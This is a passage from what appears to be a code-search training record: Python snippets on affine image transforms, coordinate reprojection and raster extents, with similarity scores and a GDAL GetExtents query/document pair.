transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=1,\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x", "def coordinate_transform_proj4(proj1, proj2, coords):\n\n srs1 = osr.SpatialReference()\n srs2 = osr.SpatialReference()\n srs1.ImportFromProj4(proj1)\n srs2.ImportFromProj4(proj2)\n\n return coordinate_transform(srs1, srs2, coords)", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=0,\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x", "def deproject_pixel(self, depth, pixel):\n if not isinstance(pixel, Point) and not pixel.dim == 2:\n raise ValueError('Must provide 2D Point object for pixel projection')\n if pixel.frame != self._frame:\n raise ValueError('Cannot deproject pixel in frame %s from camera with frame %s' %(pixel.frame, self._frame))\n\n point = np.r_[pixel.data, depth]\n point_3d = np.linalg.inv(self.S).dot(point - self.t)\n return Point(data=point_3d, frame=self._frame)", "def transform_coord(proj1, proj2, x, y):\r\n\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def transform_coord(proj1, proj2, x, y):\r\n\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def computeProjection(skyPictureInstance_id):\n \n skyPictureInstance = SkyPicture.objects.get(id = skyPictureInstance_id)\n \n # Check if it has not already been computed for this instance\n if not skyPictureInstance.undistorted or skyPictureInstance.undistorted == 'undistorted/TODO.png':\n img = np.asarray(Image.open(os.path.join(settings.BASE_DIR, skyPictureInstance.image.url[1:])))\n \n if img.shape[0] > img.shape[1]:\n img = np.rot90(img)\n \n img = np.flip(img,0)\n \n img = img[:, (np.shape(img)[1]/2 - np.shape(img)[0]/2):(np.shape(img)[1]/2 + np.shape(img)[0]/2), :]\n img = transparency(img)\n img_pil_response = Image.fromarray(img, \"RGBA\")\n \n # fetch image into memory\n temp_handle = StringIO()\n img_pil_response.save(temp_handle, 'PNG', option='optimize')\n temp_handle.seek(0)\n \n filename = skyPictureInstance.date.strftime(\"%Y-%m-%d-\") + skyPictureInstance.time.strftime(\"%H-%M-%S.png\")\n suf = SimpleUploadedFile(filename, temp_handle.read(), content_type='image/png')\n skyPictureInstance.undistorted.save(filename, suf, False)\n skyPictureInstance.save()", "def project_points(points, cam_matrix, trans, rot):\n\n # STEP 1: Transform pointcloud into new reference frame.\n points = np.dot(rot, points) + trans[:, None]\n\n # STEP 2: Project new pointcloud onto image frame using K matrix.\n # gives a 3 x N array of image plane coordinates in homogenous coordinates.\n homo_pixel_coords = np.dot(cam_matrix, points)\n\n # STEP 3: Convert homogenous coordinates to regular 2D coordinates.\n # To do this, you need to divide the first two coordinates of homo_pixel_coords\n # by the third coordinate.\n pixel_coords = homo_pixel_coords[:2] / homo_pixel_coords[2]\n\n # STEP 4: Convert to integers. Take the floor of pixel_coords then cast it\n # to an integer type, like numpy.int32\n pixel_coords = np.int32(np.floor(pixel_coords))\n\n return pixel_coords", "def xprojection(self):\n return self.image.sum(axis=0)", "def transform_coord(proj1, proj2, x, y):\r\n # Set full EPSG projection strings\r\n proj1 = pyproj.Proj(\"+init=EPSG:\"+proj1)\r\n proj2 = pyproj.Proj(\"+init=EPSG:\"+proj2)\r\n\r\n # Convert coordinates\r\n return pyproj.transform(proj1, proj2, x, y)", "def displace_to_pose(img, depth, pose, intrinsics, intrinsics_inv, rotation_mode='euler', padding_mode='zeros', return_coordinates=False):\n check_sizes(img, 'img', 'B3HW')\n\n src_pixel_coords = get_displacement_pixel_transformation(img, depth, pose, intrinsics, intrinsics_inv, rotation_mode=rotation_mode, padding_mode=padding_mode)\n projected_img = torch.nn.functional.grid_sample(img, src_pixel_coords, padding_mode=padding_mode)\n if return_coordinates:\n return projected_img, src_pixel_coords\n else:\n return projected_img", "def transform(self, data):\n return self.fit_transform(data, fitting=False)", "def _transform(\n self, x: \"torch.Tensor\", y: Optional[\"torch.Tensor\"], **kwargs\n ) -> Tuple[\"torch.Tensor\", Optional[\"torch.Tensor\"]]:\n import torch\n import torchvision.transforms.functional as F\n\n img_size = x.shape[:2]\n\n angle = float(\n torch.empty(1)\n .uniform_(float(self.degree_range[0]), float(self.degree_range[1]))\n .item()\n )\n\n max_dx = float(self.translate[0] * img_size[1])\n max_dy = float(self.translate[1] * img_size[0])\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translations = (tx, ty)\n\n scale = float(torch.empty(1).uniform_(self.scale[0], self.scale[1]).item())\n\n # x needs to have channel first\n x = x.permute(2, 0, 1)\n x = F.affine(\n img=x, angle=angle, translate=translations, scale=scale, shear=(0.0, 0.0)\n )\n x = x.permute(1, 2, 0)\n\n return torch.clamp(x, min=self.clip_values[0], max=self.clip_values[1]), y", "def transform(self, dataset: NumpyOrPandas) -> NumpyDataset:\n # checks here\n super().transform(dataset)\n # convert to accepted dtype and get attributes\n dataset = dataset.to_pandas()\n df = dataset.data\n\n # transform\n roles = NumericRole()\n outputs = []\n\n for n, conlumn_name in enumerate(df.columns):\n if self.cache_dir is not None:\n full_hash = get_textarr_hash(df[conlumn_name]) + get_textarr_hash(self.dicts[conlumn_name][\"feats\"])\n fname = os.path.join(self.cache_dir, full_hash + \".pkl\")\n\n if os.path.exists(fname):\n logger.info3(f\"Load saved dataset for {conlumn_name}\")\n\n with open(fname, \"rb\") as f:\n new_arr = pickle.load(f)\n\n else:\n new_arr = self.dicts[conlumn_name][\"transformer\"].transform(df[conlumn_name])\n with open(fname, \"wb\") as f:\n pickle.dump(new_arr, f)\n else:\n new_arr = self.dicts[conlumn_name][\"transformer\"].transform(df[conlumn_name])\n\n output = dataset.empty().to_numpy()\n output.set_data(new_arr, self.dicts[conlumn_name][\"feats\"], roles)\n outputs.append(output)\n logger.info3(f\"Feature {conlumn_name} transformed\")\n # create resulted\n return dataset.empty().to_numpy().concat(outputs)", "def get_transform(self, map_from='visual', map_to='render'):\n return self.transforms.get_transform(map_from, map_to)", "def get_transform(self, from_frame, to_frame):\n if not self._pipeline:\n return None\n try:\n from_ind = self._get_frame_index(from_frame)\n except ValueError:\n raise CoordinateFrameError(\"Frame {0} is not in the available \"\n \"frames\".format(from_frame))\n try:\n to_ind = self._get_frame_index(to_frame)\n except ValueError:\n raise CoordinateFrameError(\"Frame {0} is not in the available frames\".format(to_frame))\n if to_ind < from_ind:\n #transforms = np.array(self._pipeline[to_ind: from_ind], dtype=\"object\")[:, 1].tolist()\n transforms = [step.transform for step in self._pipeline[to_ind: from_ind]]\n transforms = [tr.inverse for tr in transforms[::-1]]\n elif to_ind == from_ind:\n return None\n else:\n #transforms = np.array(self._pipeline[from_ind: to_ind], dtype=\"object\")[:, 1].copy()\n transforms = [step.transform for step in self._pipeline[from_ind: to_ind]]\n return functools.reduce(lambda x, y: x | y, transforms)", "def _transform(self, X, y=None):\n return clone(self.transformer).fit_transform(X=X, y=y)", "def apply_transform(x, transform_matrix, channel_index=0, fill_mode='nearest', cval=0.):\n x = np.rollaxis(x, channel_index, 0)\n final_affine_matrix = transform_matrix[:2, :2]\n final_offset = transform_matrix[:2, 2]\n channel_images = [ndi.interpolation.affine_transform(x_channel,\n final_affine_matrix,\n final_offset, order=0, mode=fill_mode, cval=cval)\n for x_channel in x]\n x = np.stack(channel_images, axis=0)\n x = np.rollaxis(x, 0, channel_index+1)\n return x", "def get_dataset_transform(dataset_name):\n if dataset_name == \"MNIST\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n elif dataset_name == \"CIFAR10\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n elif dataset_name == \"CIFAR100\":\n train_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))\n ])\n elif dataset_name == \"EMNIST\":\n train_transform = transforms.Compose([\n Transpose(),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n test_transform = transforms.Compose([\n Transpose(),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n else:\n print(\"current dataset name:{} is not right\".format(dataset_name))\n sys.exit(1)\n return train_transform, test_transform", "def transformAffine(self, path=None, src=None, dst=None):\n if path is not None:\n landmarks = pd.read_csv(path, skiprows=1,engine=\"c\", na_filter=False, header=None, delim_whitespace=True, dtype=np.float32).as_matrix()\n dst = landmarks[:,3:5]\n src = landmarks[:,1:3]\n affine = transform.estimate_transform(\"affine\",src,dst)\n data = self.stormData[0][:,0:2]\n data = affine(data)\n self.stormData[0][:,0:2] = data", "def _pixel_to_map(coordinates, geotransform):\n coordinates_map = np.empty(coordinates.shape)\n coordinates_map[..., 0] = (\n geotransform[0]\n + geotransform[1] * coordinates[..., 0]\n + geotransform[2] * coordinates[..., 1]\n )\n coordinates_map[..., 1] = (\n geotransform[3]\n + geotransform[4] * coordinates[..., 0]\n + geotransform[5] * coordinates[..., 1]\n )\n return coordinates_map", "def test_coords_transformation():\n\n # H+R+S+T, not reverse, depth\n img_meta = {\n 'pcd_scale_factor':\n 1.2311e+00,\n 'pcd_rotation': [[8.660254e-01, 0.5, 0], [-0.5, 8.660254e-01, 0],\n [0, 0, 1.0e+00]],\n 'pcd_trans': [1.111e-02, -8.88e-03, 0.0],\n 'pcd_horizontal_flip':\n True,\n 'transformation_3d_flow': ['HF', 'R', 'S', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, -2.9757e-01, 4.0021e+01],\n [-9.1435e-01, 2.6675e+01, -5.5950e+00],\n [2.0089e-01, 5.8098e+00, -3.5409e+01],\n [-1.9461e-01, 3.1309e+01, -1.0901e+00]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=False)\n\n expected_tensor = torch.tensor(\n [[5.78332345e+00, 2.900697e+00, 4.92698531e+01],\n [-1.5433839e+01, 2.8993850e+01, -6.8880045e+00],\n [-3.77929405e+00, 6.061661e+00, -4.35920199e+01],\n [-1.9053658e+01, 3.3491436e+01, -1.34202211e+00]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # H+R+S+T, reverse, depth\n img_meta = {\n 'pcd_scale_factor':\n 7.07106781e-01,\n 'pcd_rotation': [[7.07106781e-01, 7.07106781e-01, 0.0],\n [-7.07106781e-01, 7.07106781e-01, 0.0],\n [0.0, 0.0, 1.0e+00]],\n 'pcd_trans': [0.0, 0.0, 0.0],\n 'pcd_horizontal_flip':\n False,\n 'transformation_3d_flow': ['HF', 'R', 'S', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, -2.9757e-01, 4.0021e+01],\n [-9.1435e+01, 2.6675e+01, -5.5950e+00],\n [6.061661e+00, -0.0, -1.0e+02]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=True)\n\n expected_tensor = torch.tensor(\n [[-5.53977e+00, 4.94463e+00, 5.65982409e+01],\n [-6.476e+01, 1.1811e+02, -7.91252488e+00],\n [6.061661e+00, -6.061661e+00, -1.41421356e+02]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # H+R+S+T, not reverse, camera\n img_meta = {\n 'pcd_scale_factor':\n 1.0 / 7.07106781e-01,\n 'pcd_rotation': [[7.07106781e-01, 0.0, 7.07106781e-01],\n [0.0, 1.0e+00, 0.0],\n [-7.07106781e-01, 0.0, 7.07106781e-01]],\n 'pcd_trans': [1.0e+00, -1.0e+00, 0.0],\n 'pcd_horizontal_flip':\n True,\n 'transformation_3d_flow': ['HF', 'S', 'R', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, 4.0021e+01, -2.9757e-01],\n [-9.1435e+01, -5.5950e+00, 2.6675e+01],\n [6.061661e+00, -1.0e+02, -0.0]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'CAMERA', img_meta, reverse=False)\n\n expected_tensor = torch.tensor(\n [[6.53977e+00, 5.55982409e+01, 4.94463e+00],\n [6.576e+01, -8.91252488e+00, 1.1811e+02],\n [-5.061661e+00, -1.42421356e+02, -6.061661e+00]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V, reverse, camera\n img_meta = {'pcd_vertical_flip': True, 'transformation_3d_flow': ['VF']}\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'CAMERA', img_meta, reverse=True)\n\n expected_tensor = torch.tensor([[-5.2422e+00, 4.0021e+01, 2.9757e-01],\n [-9.1435e+01, -5.5950e+00, -2.6675e+01],\n [6.061661e+00, -1.0e+02, 0.0]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V+H, not reverse, depth\n img_meta = {\n 'pcd_vertical_flip': True,\n 'pcd_horizontal_flip': True,\n 'transformation_3d_flow': ['VF', 'HF']\n }\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=False)\n\n expected_tensor = torch.tensor([[5.2422e+00, -4.0021e+01, -2.9757e-01],\n [9.1435e+01, 5.5950e+00, 2.6675e+01],\n [-6.061661e+00, 1.0e+02, 0.0]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V+H, reverse, lidar\n img_meta = {\n 'pcd_vertical_flip': True,\n 'pcd_horizontal_flip': True,\n 'transformation_3d_flow': ['VF', 'HF']\n }\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'LIDAR', img_meta, reverse=True)\n\n expected_tensor = torch.tensor([[5.2422e+00, -4.0021e+01, -2.9757e-01],\n [9.1435e+01, 5.5950e+00, 2.6675e+01],\n [-6.061661e+00, 1.0e+02, 0.0]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)", "def transform(self, X):\n\n t0 = time.perf_counter()\n check_is_fitted(self)\n self.check_external_components_modified()#[WARN] in d3m, primitives can \"restore\" private class variables...\n X = self._validate_data(X, accept_sparse=[\"csr\", \"csc\"], reset=False)\n t1 = time.perf_counter()\n\n if X.shape[1] != self.components_af_.shape[1]:\n raise ValueError(\n \"Impossible to perform projection:\"\n \"X at fit stage had a different number of features. \"\n \"(%s != %s)\" % (X.shape[1], self.components_af_.shape[1])\n )\n\n #X_new = safe_sparse_dot(X, self.components_.T, dense_output=self.dense_output)\n #import pdb; pdb.set_trace()\n X_af = af.interop.from_ndarray(X).as_type(self.components_af_.dtype())\n X_new = af.matmulNT(X_af, self.components_af_)\n X_new = X_new.to_ndarray()\n t2 = time.perf_counter()\n return X_new", "def setCrsIsProjection(self):\n self.isgeographic = False", "def set_transform(self, tf):\n self.camera.SetTransform(tf)", "def transform(self, srid: ir.IntegerValue) -> GeoSpatialValue:\n return ops.GeoTransform(self, srid).to_expr()", "def _select_transform(self):\n for transform in self.transforms:\n if transform.applies is None or transform.applies(self.ti_dict) is True:\n self.transform = transform\n break\n else:\n raise RuntimeError('No transform found for TI data')", "def set_transform(self, transform):\n self._transform = transform", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.,\n interp_order=0):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:3, :3]\n final_offset = transform_matrix[:3, -1]\n channel_volumes = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=interp_order, # NOTE: The order of the spline interpolation\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_volumes, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x" ]
[ "0.6720557", "0.6548644", "0.6337521", "0.6230713", "0.62149775", "0.58759457", "0.58334744", "0.5782975", "0.5738817", "0.56981885", "0.5647636", "0.5635617", "0.5624577", "0.5602451", "0.55902624", "0.5584441", "0.5567373", "0.55569345", "0.55569345", "0.5550751", "0.552929", "0.54919827", "0.5490159", "0.54779094", "0.5475191", "0.5470257", "0.54520786", "0.54448014", "0.54384285", "0.5435653", "0.5430392", "0.5413855", "0.5407643", "0.53956044", "0.53721946", "0.5369844", "0.53660345", "0.53596693", "0.5338315", "0.53264916", "0.5308238", "0.53082347", "0.5279875", "0.5273014", "0.52558863", "0.52554613", "0.52545464", "0.5242427", "0.52370423", "0.52360666", "0.52293295", "0.5228455", "0.5212772", "0.5207434", "0.52031183", "0.5182809", "0.51702833", "0.51702833", "0.51702833", "0.5169828", "0.51623565", "0.5145855", "0.5145717", "0.5145486", "0.513241", "0.51280165", "0.51212513", "0.5119788", "0.5095306", "0.5093604", "0.5087195", "0.5083273", "0.5082387", "0.50799567", "0.5079166", "0.5069819", "0.5069819", "0.5069103", "0.5064534", "0.50637126", "0.5062107", "0.5060045", "0.5055635", "0.5045152", "0.5039407", "0.50366175", "0.5021306", "0.50170046", "0.50162876", "0.50110936", "0.50040156", "0.49997258", "0.4996688", "0.49913839", "0.49875358", "0.49870628", "0.49853915", "0.49759674", "0.4974922", "0.49618715" ]
0.5615591
13
Returns (lowerleft, upperright) extents in transform's destination projection. If transform is None, no reprojection occurs and the dataset's SpatialReference is used.
def GetExtents(self, transform=None): # Prepare GDAL functions to compute extents x_size, y_size = self.RasterXSize, self.RasterYSize # Compute four corners in destination projection upper_left = self.PixelCoordinates(0, 0, transform=transform) upper_right = self.PixelCoordinates(x_size, 0, transform=transform) lower_left = self.PixelCoordinates(0, y_size, transform=transform) lower_right = self.PixelCoordinates(x_size, y_size, transform=transform) x_values, y_values = list(zip(upper_left, upper_right, lower_left, lower_right)) # Return lower-left and upper-right extents return Extents(lower_left=XY(min(x_values), min(y_values)), upper_right=XY(max(x_values), max(y_values)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extent(self):\n left = self.transform[0]\n right = left + self.transform[1] * self.shape[1]\n top = self.transform[3]\n bottom = top + self.transform[5] * self.shape[0]\n return left, right, bottom, top", "def extent(self):\n if self.x is not None:\n if self.y is not None:\n if self.z is not None:\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max(),\n self.z.min(), self.z.max())\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max())\n return (self.x.min(), self.x.max())\n\n elif self.r is not None and self.t is not None:\n if self.z is not None:\n return (self.z.min(), self.z.max(),\n self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n return (self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n\n return ()", "def get_extent(self):\n geot = self.geotransform()\n return (geot[0], geot[3] + self.YSize() * geot[5],\n geot[0] + self.XSize() * geot[1], geot[3])", "def get_extent_from_dataset(ds):\n\n transform = ds.GetGeoTransform()\n rows = ds.RasterYSize\n cols = ds.RasterXSize\n\n west = transform[0]\n ewres = transform[1]\n north = transform[3]\n nsres = transform[5]\n\n south = north + (rows * nsres)\n east = west + (cols * ewres)\n\n # print(\"crs\", ds.GetProjection())\n # print(\"cols\", cols)\n # print(\"north\", north)\n # print(\"south\", south)\n # print(\"west\", west)\n # print(\"east\", east)\n # print(\"ewres\", ewres)\n # print(\"nsres\", nsres)\n\n extent = SpatialExtent(top=north, bottom=south, left=west,\n right=east, width=abs(ewres), height=abs(nsres))\n\n return extent", "def extent(self):\n rx0 = gxapi.float_ref()\n ry0 = gxapi.float_ref()\n rz0 = gxapi.float_ref()\n rx1 = gxapi.float_ref()\n ry1 = gxapi.float_ref()\n rz1 = gxapi.float_ref()\n self.gxvox.get_area(rx0, ry0, rz0, rx1, ry1, rz1)\n if self.is_depth:\n return gxgm.Point2(((rx0.value, ry0.value, -rz1.value), (rx1.value, ry1.value, -rz0.value)))\n return gxgm.Point2(((rx0.value, ry0.value, rz0.value), (rx1.value, ry1.value, rz1.value)),\n self.coordinate_system)", "def geotransform(self):\n return self.dataset.GetGeoTransform() if self.dataset else None", "def GetTmsExtents(self, resolution=None, transform=None):\n if resolution is None:\n resolution = self.GetNativeResolution(transform=transform)\n\n # Get the tile dimensions in map units\n if transform is None:\n spatial_ref = self.GetSpatialReference()\n else:\n spatial_ref = transform.dst_ref\n\n tile_width, tile_height = spatial_ref.GetTileDimensions(\n resolution=resolution\n )\n\n # Validate that the native resolution extents are tile-aligned.\n extents = self.GetTiledExtents(transform=transform)\n pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution)\n if not extents.almost_equal(self.GetExtents(transform=transform),\n delta=min(*pixel_sizes)):\n raise UnalignedInputError('Dataset is not aligned to TMS grid')\n\n # Correct for origin, because you can't do modular arithmetic on\n # half-tiles.\n left, bottom = spatial_ref.OffsetPoint(*extents.lower_left)\n right, top = spatial_ref.OffsetPoint(*extents.upper_right)\n\n # Divide by number of tiles\n return Extents(lower_left=XY(int(round(left / tile_width)),\n int(round(bottom / tile_height))),\n upper_right=XY(int(round(right / tile_width)),\n int(round(top / tile_height))))", "def get_extents(self, view, ranges):\n ndims = len(view.dimensions())\n num = 6 if self.projection == '3d' else 4\n if self.apply_ranges:\n if ranges:\n dims = view.dimensions()\n x0, x1 = ranges[dims[0].name]\n if ndims > 1:\n y0, y1 = ranges[dims[1].name]\n else:\n y0, y1 = (np.NaN, np.NaN)\n if self.projection == '3d':\n if len(dims) > 2:\n z0, z1 = ranges[dims[2].name]\n else:\n z0, z1 = np.NaN, np.NaN\n else:\n x0, x1 = view.range(0)\n y0, y1 = view.range(1) if ndims > 1 else (np.NaN, np.NaN)\n if self.projection == '3d':\n z0, z1 = view.range(2)\n if self.projection == '3d':\n range_extents = (x0, y0, z0, x1, y1, z1)\n else:\n range_extents = (x0, y0, x1, y1)\n else:\n range_extents = (np.NaN,) * num\n\n if self.apply_extents:\n norm_opts = self.lookup_options(view, 'norm').options\n if norm_opts.get('framewise', False) or self.dynamic:\n extents = view.extents\n else:\n extent_list = self.hmap.traverse(lambda x: x.extents, [Element])\n extents = util.max_extents(extent_list, self.projection == '3d')\n else:\n extents = (np.NaN,) * num\n return tuple(l1 if l2 is None or not np.isfinite(l2) else\n l2 for l1, l2 in zip(range_extents, extents))", "def get_extent(self):\n pass", "def get_extent(ds):\n\n #\n # Check if latitude and longitude are stored as coordinates.\n #\n if 'lon' in ds.coords and 'lat' in ds.coords:\n return BoundingBox(\n left=ds.lon.values.min(),\n bottom=ds.lat.values.min(),\n right=ds.lon.values.max(),\n top=ds.lat.values.max()\n )\n\n #\n # Otherwise, get extent from projection information\n # by projecting the corner coordinates onto EPSG:4326\n # to obtain the latitude and longitude at the four corners.\n #\n src_crs = get_crs(ds)\n if src_crs is None:\n raise CRSError('Could not determine the CRS.')\n\n dst_crs = CRS(init='epsg:4326')\n proj_bounds = get_bounds(ds)\n bounds = rasterio.warp.transform_bounds(\n src_crs, dst_crs, **proj_bounds._asdict()\n )\n return BoundingBox(*bounds)", "def extent(self):\n\n x = np.array([0, self.nx]) * self.dx + self.corner_grid.x0\n ypoint = [0, self.ny] if self.origin == 'lower-left' else [self.ny, 0]\n y = np.array(ypoint) * self.dy + self.corner_grid.y0\n\n return [x[0], x[1], y[0], y[1]]", "def extent_in_crs(self, crs=wgs84):\n\n # this is not so trivial\n # for optimisation we will transform the boundaries only\n poly = self.extent_as_polygon(crs=crs)\n _i, _j = poly.exterior.xy\n return [np.min(_i), np.max(_i), np.min(_j), np.max(_j)]", "def get_data_extent(self):\n xs, ys = self.xs, self.ys\n xmin, xmax = min(xs), max(xs)\n ymin, ymax = min(xy), max(ys)\n w = maxx - minx\n h = maxy - miny\n return xmin, ymax, w, h", "def extents(self):\n x0, y0, width, height = self._rect_bbox\n xmin, xmax = sorted([x0, x0 + width])\n ymin, ymax = sorted([y0, y0 + height])\n return xmin, xmax, ymin, ymax", "def _getGeoTransform(self):\n with self._getDatasetLock:\n gt = self.dataset.GetGeoTransform()\n if (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()):\n gt = gdal.GCPsToGeoTransform(self.dataset.GetGCPs())\n return gt", "def extent(self) -> Tuple[float]:\n ext = (\n min(self.putin.geometry.x, self.takeout.geometry.x),\n min(self.putin.geometry.y, self.takeout.geometry.y),\n max(self.putin.geometry.x, self.takeout.geometry.x),\n max(self.putin.geometry.y, self.takeout.geometry.y),\n )\n return ext", "def extent(self):\n ulx, uly, lrx, lry = self.ul_lr\n return ulx, lry, lrx, uly", "def extents(self):\n\n return self._local", "def extent_from_metadata(meta):\n\n meta = find_meta_branch(meta, 'geosoft')\n if meta:\n cs = coordinate_system_from_metadata(meta)\n try:\n ex = meta['geosoft']['dataset']['georeference']['dataextents']['extent3d']\n minp = gxgm.Point((float(ex['@minx']), float(ex['@miny']), float(ex['@minz'])))\n maxp = gxgm.Point((float(ex['@maxx']), float(ex['@maxy']), float(ex['@maxz'])))\n return gxgm.Point2((minp, maxp), cs)\n\n except KeyError:\n pass\n\n return None", "def get_geographic_extent(self, project):\n if project.geographic_extent is not None:\n return json.loads(project.geographic_extent.json)\n else:\n return None", "def get_raster_extent(dataset, geo=False, window=True):\n\n x_size = dataset.RasterXSize\n y_size = dataset.RasterYSize\n geotrans = dataset.GetGeoTransform()\n xmin = geotrans[0]\n ymax = geotrans[3]\n xmax = geotrans[0] + geotrans[1] * x_size\n ymin = geotrans[3] + geotrans[5] * y_size\n\n extent = np.array([[xmin, ymax], [xmin, ymin], [xmax, ymin], [xmax, ymax]])\n\n if geo:\n projection = read_gdal_projection(dataset)\n extent = georef.reproject(extent, projection_source=projection)\n\n if window:\n x = extent[:, 0]\n y = extent[:, 1]\n extent = np.array([x.min(), x.max(), y.min(), y.max()])\n\n return extent", "def getExtent(self):\n extent = self.parent.biomeGeometry.extent\n return extent", "def extent(self):\n return self._extent", "def get_data_extent(self):\n \n x, y = self.xy[0], self.xy[1]\n w, h = self.radius, self.radius\n return x-w, y+w, w, h", "def extents(self):\n if self.direction == 'horizontal':\n vmin = self._selection_artist.get_x()\n vmax = vmin + self._selection_artist.get_width()\n else:\n vmin = self._selection_artist.get_y()\n vmax = vmin + self._selection_artist.get_height()\n return vmin, vmax", "def get_data_extent(self):\n x, y = self.xy[0], self.xy[1]\n w, h = self.width, self.height\n return x, y, w, h", "def transform_bounds(\n self, dst_crs: CRS | int | str | dict, densify_pts: int = 21\n ) -> tuple[float, float, float, float]:\n if self.crs != dst_crs:\n bounds = rasterio.warp.transform_bounds(\n self.crs, dst_crs, *self.bounds, densify_pts=densify_pts\n )\n else:\n bounds = self.bounds\n return bounds", "def extent(self, start=None, finish=None):\n start, finish = self.bounds(start, finish)\n try:\n return finish - start + 1\n except TypeError:\n return None", "def bounds(self) -> tuple[float, float, float, float]:\n transform = self.transform\n a, b, c, d, e, f, _, _, _ = transform\n if b == d == 0:\n xs = (c, c + a * self.width)\n ys = (f, f + e * self.height)\n else: # rotated\n c0x, c0y = c, f\n c1x, c1y = transform * (0, self.height)\n c2x, c2y = transform * (self.width, self.height)\n c3x, c3y = transform * (self.width, 0)\n xs = (c0x, c1x, c2x, c3x)\n ys = (c0y, c1y, c2y, c3y)\n return min(xs), min(ys), max(xs), max(ys)", "def _reproject(ds, dst_crs=None, dst_transform=None, width=None, height=None,\n res=None, extent=None, **kwargs):\n\n if 'resampling' not in kwargs:\n kwargs['resampling'] = rasterio.warp.Resampling.cubic\n\n src_crs = get_crs(ds)\n src_bounds = get_bounds(ds)\n if extent is not None:\n extent = BoundingBox(*extent)\n\n #\n # Only allow inferring of width or height from aspect ratio\n # if the CRS is not changed.\n #\n if dst_crs is None:\n dst_crs = src_crs\n if width is None and height is not None:\n width = int(ncols(ds) * height / nrows(ds))\n elif height is None and width is not None:\n height = int(nrows(ds) * width / ncols(ds))\n\n # Given: transform, shape\n # Given: transform, extent\n # Given: res, extent\n # Given: shape, res\n # Given: shape, extent\n\n if dst_transform is not None:\n #\n # If the transform is given, we also need the width and height or\n # the extent.\n #\n if width is not None and height is not None:\n pass\n elif extent is not None:\n # Calculate width and height from extent\n width = int(abs(\n (extent.right - extent.left) / dst_transform.a)) + 1\n height = int(abs(\n (extent.top - extent.bottom) / dst_transform.e)) + 1\n else:\n raise ValueError('Not enough information provided.')\n\n elif extent is not None:\n #\n # Transform can be calculated from extent, if either width and height\n # or the resolution are given.\n #\n if res is not None:\n width = int(abs(\n (extent.right - extent.left) / res[0])) + 1\n height = int(abs(\n (extent.top - extent.bottom) / res[1])) + 1\n\n # The following doesn't give the correct result.\n dst_transform = rasterio.transform.from_bounds(\n *extent, width=width-1, height=height-1\n )\n\n else:\n #\n # If neither the transform nor the extent are given, infer the best\n # possible parameters from the width, height, and the resolution.\n #\n 